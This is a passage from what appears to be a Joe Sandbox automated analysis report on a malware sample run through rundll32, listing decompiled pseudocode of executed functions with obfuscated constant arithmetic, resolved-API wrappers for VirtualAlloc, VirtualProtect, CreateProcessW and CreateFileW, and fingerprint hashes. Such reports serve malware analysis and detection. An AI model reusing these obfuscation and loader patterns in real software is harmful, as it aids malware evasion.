DdeCreateStringHandleA DdeNameService 31547->31549 31550 2051ae0 DdeFreeStringHandle 31548->31550 31549->31546 31550->31549

                                                                      Executed Functions

                                                                      Function 020004C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 437 20004c7-2000565 call 1ff7378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E020004C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E01FF7378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}









                                                                      0x020004cd
                                                                      0x020004d6
                                                                      0x020004dd
                                                                      0x020004e1
                                                                      0x020004e5
                                                                      0x020004ec
                                                                      0x020004f8
                                                                      0x020004fd
                                                                      0x02000502
                                                                      0x02000509
                                                                      0x02000510
                                                                      0x02000517
                                                                      0x0200051f
                                                                      0x02000522
                                                                      0x02000529
                                                                      0x02000530
                                                                      0x02000537
                                                                      0x02000556
                                                                      0x02000560

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 02000560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: e4b262c159388f6696a489feb567fc720f0a78e978fad19ceec5f864b40ac6b0
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 6811F771E0520CEBEB04DFE4D84AA9EBBB1EB50714F10C189E514A7294D7F96B548F41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02053928, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 440 2053928-20539b4 call 20379dc 445 20539b6 440->445 446 20539bd-20539cf GetEnhMetaFileA 440->446 445->446 448 20539d1 446->448 449 20539d8-20539ec 446->449 448->449 450 2053a0e-2053ac5 VirtualAlloc 449->450 451 20539ee-2053a0c 449->451 459 2053acf-2053ada 450->459 451->450 460 2053b21-2053b33 459->460 461 2053adc-2053b1f 459->461 462 2053b75-2053bac 460->462 463 2053b35-2053b73 460->463 461->459 463->462 463->463
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 020539C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,02056CB4,00001000,00000040), ref: 02053A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345
                                                                      • API String ID: 2643768156-4105825235
                                                                      • Opcode ID: 4d3adc2f1cf1f0834a7b93784baba7307adb10a6bef81e2ff702f728e04ea475
                                                                      • Instruction ID: ca6d67a1d76c8353d868f86cc8b08fb5941d57e10ecd5c53ea0ca605c84c39e7
                                                                      • Opcode Fuzzy Hash: 4d3adc2f1cf1f0834a7b93784baba7307adb10a6bef81e2ff702f728e04ea475
                                                                      • Instruction Fuzzy Hash: D9619570E853259FE780DF68E586A273FA9FB04354BC08959E5098B260DF7BA864DF04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF9B5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 491 1ff9b5e-1ff9c3f call 2002550 call 1ff7378 RtlAllocateHeap
                                                                      C-Code - Quality: 72%
                                                                      			E01FF9B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t52;
				void* _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				long _t81;

				_push(_a12);
				_t81 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02002550(_t52);
				_v36 = 0x84647;
				asm("stosd");
				asm("stosd");
				_t70 = 0x14;
				asm("stosd");
				_v20 = 0xbd42;
				_t71 = 0x62;
				_v20 = _v20 / _t70;
				_v20 = _v20 ^ 0x00000265;
				_v16 = 0x7dd6;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x742f5ff0;
				_v16 = _v16 ^ 0x742f2524;
				_v12 = 0x61c8;
				_t72 = 0x48;
				_v12 = _v12 / _t72;
				_v12 = _v12 + 0xffff34fc;
				_v12 = _v12 ^ 0xffff6696;
				_v8 = 0xb2ad;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 * 0xd;
				_v8 = _v8 | 0x4443bccc;
				_v8 = _v8 ^ 0x475ff878;
				E01FF7378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
				return _t68;
			}















                                                                      0x01ff9b66
                                                                      0x01ff9b69
                                                                      0x01ff9b6b
                                                                      0x01ff9b6e
                                                                      0x01ff9b71
                                                                      0x01ff9b73
                                                                      0x01ff9b78
                                                                      0x01ff9b87
                                                                      0x01ff9b8c
                                                                      0x01ff9b8d
                                                                      0x01ff9b90
                                                                      0x01ff9b91
                                                                      0x01ff9b9d
                                                                      0x01ff9b9e
                                                                      0x01ff9ba3
                                                                      0x01ff9baa
                                                                      0x01ff9bb8
                                                                      0x01ff9bbd
                                                                      0x01ff9bc4
                                                                      0x01ff9bcb
                                                                      0x01ff9bd5
                                                                      0x01ff9bdd
                                                                      0x01ff9be0
                                                                      0x01ff9be7
                                                                      0x01ff9bee
                                                                      0x01ff9c05
                                                                      0x01ff9c0c
                                                                      0x01ff9c0f
                                                                      0x01ff9c16
                                                                      0x01ff9c29
                                                                      0x01ff9c38
                                                                      0x01ff9c3f

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 01FF9C38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: $%/t
                                                                      • API String ID: 1279760036-1978068534
                                                                      • Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction ID: f52a3304ddcb00eb23d28622f3d97456427306db8a4b89acdf360cecde9d3a22
                                                                      • Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction Fuzzy Hash: CD214671D00209BFEB18CFA9C9469DEBFB5FB44310F108199E814AA2A0D7B99B109B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200C0C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 496 200c0c8-200c191 call 2002550 call 1ff7378 CreateFileW
                                                                      C-Code - Quality: 53%
                                                                      			E0200C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t48;
				long _t52;
				long _t53;

				_t52 = __edx;
				_push(0);
				_push(_a36);
				_t53 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t40);
				_v20 = 0xb477;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000000e5;
				_v16 = 0xb312;
				_v16 = _v16 + 0x2a6f;
				_v16 = _v16 ^ 0x0000d90b;
				_v12 = 0x5a0b;
				_v12 = _v12 + 0x400b;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x09a119a3;
				_v8 = 0x3388;
				_v8 = _v8 + 0x85f8;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x00415e39;
				E01FF7378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
				return _t48;
			}











                                                                      0x0200c0d3
                                                                      0x0200c0d5
                                                                      0x0200c0d6
                                                                      0x0200c0d9
                                                                      0x0200c0db
                                                                      0x0200c0de
                                                                      0x0200c0df
                                                                      0x0200c0e2
                                                                      0x0200c0e5
                                                                      0x0200c0e8
                                                                      0x0200c0eb
                                                                      0x0200c0ee
                                                                      0x0200c0f1
                                                                      0x0200c0f2
                                                                      0x0200c0f3
                                                                      0x0200c0f8
                                                                      0x0200c102
                                                                      0x0200c106
                                                                      0x0200c10d
                                                                      0x0200c114
                                                                      0x0200c11b
                                                                      0x0200c122
                                                                      0x0200c129
                                                                      0x0200c130
                                                                      0x0200c134
                                                                      0x0200c13b
                                                                      0x0200c142
                                                                      0x0200c15d
                                                                      0x0200c160
                                                                      0x0200c174
                                                                      0x0200c189
                                                                      0x0200c191

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0200C189
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 9^A
                                                                      • API String ID: 823142352-4044883665
                                                                      • Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction ID: 3634cf961e5269d84bb9ce76844c508a8a838f4f80d4d86795d2dcdcde9cd559
                                                                      • Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction Fuzzy Hash: 0621E2B290020CBFEF019F95DD498DEBBB9EB55358F108198FA2462250D7B69E249B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02051638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 501 2051638-2051641 502 2051643 501->502 503 205164b-20516d1 DdeInitializeA call 2051328 call 2051a14 501->503 502->503 513 20516d6-20516eb 503->513
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 02051686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: bfdc67b36e9c4c0ef12b445dcb8fc8790d10a4a4e7b7a1c4cd18bcd2b9ce1714
                                                                      • Instruction ID: 102dd1c3f1f4a56211691c16e4c62dda2d5b53e1e265d8b3ef48693c814b44d7
                                                                      • Opcode Fuzzy Hash: bfdc67b36e9c4c0ef12b445dcb8fc8790d10a4a4e7b7a1c4cd18bcd2b9ce1714
                                                                      • Instruction Fuzzy Hash: 7A119E70600B11AFE721EB75CD81B4FB7E5EF55700F901828E905DBB60EABAB901AB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001DEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 515 1deb40-1deb93 VirtualProtect 516 1deb95-1deba1 515->516 517 1deba6-1dec17 515->517 518 1dec3a-1dec85 call 1de7a0 call 1de7e0 516->518 517->518 533 1dec19-1dec37 517->533 525 1dec90-1dec9a 518->525 527 1dec9c-1deca3 525->527 528 1decf8-1ded4a call 1de920 525->528 531 1deced-1decf6 527->531 532 1deca5-1decac 527->532 537 1ded4c-1ded50 528->537 538 1ded78-1ded7f 528->538 531->525 532->531 536 1decae-1decea call 1de7e0 532->536 533->518 536->531 537->538 542 1ded52-1ded75 call 1de880 537->542 543 1ded8a-1ded94 538->543 542->538 545 1dede6-1dee1b call 1df000 543->545 546 1ded96-1ded9d 543->546 549 1ded9f-1deda6 546->549 550 1deddb-1dede4 546->550 549->550 553 1deda8-1dedd9 call 1dee20 VirtualProtect 549->553 550->543 553->550
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001DEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001DEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1c0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: b148d44ab56b61b2bca518033b4ef3e6d81f2716129a530a4a85c7b1bde80d7b
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 9EC1A875A002099FCB48DF88C590EAEB7B6BF88305F248159E9099F355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02051A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 556 2051a14-2051a5a call 2051ac8 562 2051a70-2051aa7 DdeCreateStringHandleA DdeNameService 556->562 563 2051a5c-2051a69 556->563 566 2051aaf 562->566 563->562
                                                                      APIs
                                                                        • Part of subcall function 02051AC8: DdeFreeStringHandle.USER32(?,?), ref: 02051AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 02051A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 02051A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 48bd3f3e65ea61ee71d3cec3b1eb1da49123c928072fc80cbfbc101b0d5bb205
                                                                      • Instruction ID: b151ea0f558b62dc6bad685f41c6d064b33f40c121761eab6ec87d08343984d6
                                                                      • Opcode Fuzzy Hash: 48bd3f3e65ea61ee71d3cec3b1eb1da49123c928072fc80cbfbc101b0d5bb205
                                                                      • Instruction Fuzzy Hash: 34118E31710325ABDB12EFA4CC80A5F77EDEF09B00B4005A4FE04EB255D6B1ED0097A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF7F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 80%
                                                                      			E01FF7F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E02002550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E01FF7378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}













                                                                      0x01ff7f52
                                                                      0x01ff7f55
                                                                      0x01ff7f57
                                                                      0x01ff7f5a
                                                                      0x01ff7f5e
                                                                      0x01ff7f5f
                                                                      0x01ff7f64
                                                                      0x01ff7f6b
                                                                      0x01ff7f72
                                                                      0x01ff7f79
                                                                      0x01ff7f94
                                                                      0x01ff7f97
                                                                      0x01ff7f9e
                                                                      0x01ff7fa5
                                                                      0x01ff7fac
                                                                      0x01ff7fb3
                                                                      0x01ff7fba
                                                                      0x01ff7fbe
                                                                      0x01ff7fc5
                                                                      0x01ff7fcc
                                                                      0x01ff7fd3
                                                                      0x01ff7fd7
                                                                      0x01ff7feb
                                                                      0x01ff7ff7
                                                                      0x01ff7ffd

                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 01FF7FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: 95dc4129b8c9b7350b193ba354ecb56fd3d1da8b3ad54597fa8731147189f0d9
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: 5B11DFB6C01219BBEF01EFA4C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001DE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001DE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1c0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: bc6b326a41a5d26bea6e29ba8bc052ecf4b9a8ac294c75c02919a97063cff55d
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 36113060D08289EAEF01D7E884097FEBFB55B21705F044098E5446B282D3BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200B86E, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 40%
                                                                      			E0200B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E02002550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E01FF7378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}











                                                                      0x0200b876
                                                                      0x0200b87b
                                                                      0x0200b87d
                                                                      0x0200b87e
                                                                      0x0200b881
                                                                      0x0200b884
                                                                      0x0200b887
                                                                      0x0200b88a
                                                                      0x0200b88d
                                                                      0x0200b890
                                                                      0x0200b891
                                                                      0x0200b892
                                                                      0x0200b893
                                                                      0x0200b896
                                                                      0x0200b897
                                                                      0x0200b89a
                                                                      0x0200b89d
                                                                      0x0200b8a0
                                                                      0x0200b8a4
                                                                      0x0200b8a5
                                                                      0x0200b8aa
                                                                      0x0200b8bb
                                                                      0x0200b8c3
                                                                      0x0200b8c6
                                                                      0x0200b8ca
                                                                      0x0200b8d1
                                                                      0x0200b8d8
                                                                      0x0200b8df
                                                                      0x0200b8e6
                                                                      0x0200b8ed
                                                                      0x0200b8f1
                                                                      0x0200b8f4
                                                                      0x0200b8fb
                                                                      0x0200b902
                                                                      0x0200b909
                                                                      0x0200b928
                                                                      0x0200b942
                                                                      0x0200b949

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0200B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: f2a587d58244c9be459cf44d469b377bdf4ad0f5d92e2352495b40eda2cd12b4
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 0721C472800248BBEF159F95CD09CDFBFB9FF89714F408158FA1466260D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF471A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E01FF471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E02002550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E01FF7378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}












                                                                      0x01ff473b
                                                                      0x01ff4740
                                                                      0x01ff474a
                                                                      0x01ff4753
                                                                      0x01ff475a
                                                                      0x01ff4761
                                                                      0x01ff4765
                                                                      0x01ff476f
                                                                      0x01ff4772
                                                                      0x01ff4775
                                                                      0x01ff477c
                                                                      0x01ff4788
                                                                      0x01ff4789
                                                                      0x01ff478e
                                                                      0x01ff4792
                                                                      0x01ff4799
                                                                      0x01ff47aa
                                                                      0x01ff47ad
                                                                      0x01ff47b4
                                                                      0x01ff47d3
                                                                      0x01ff47e4
                                                                      0x01ff47ea

                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 01FF47E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 1a88c1d8ed51b6097d23ccce26c076287bbe3dadd5d3f1899b9891b62f7bab5b
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: A721F272D01218BBEF05DFE4C84A8DEBBB5EF05354F108089E924A6290D3B59B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200340E, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
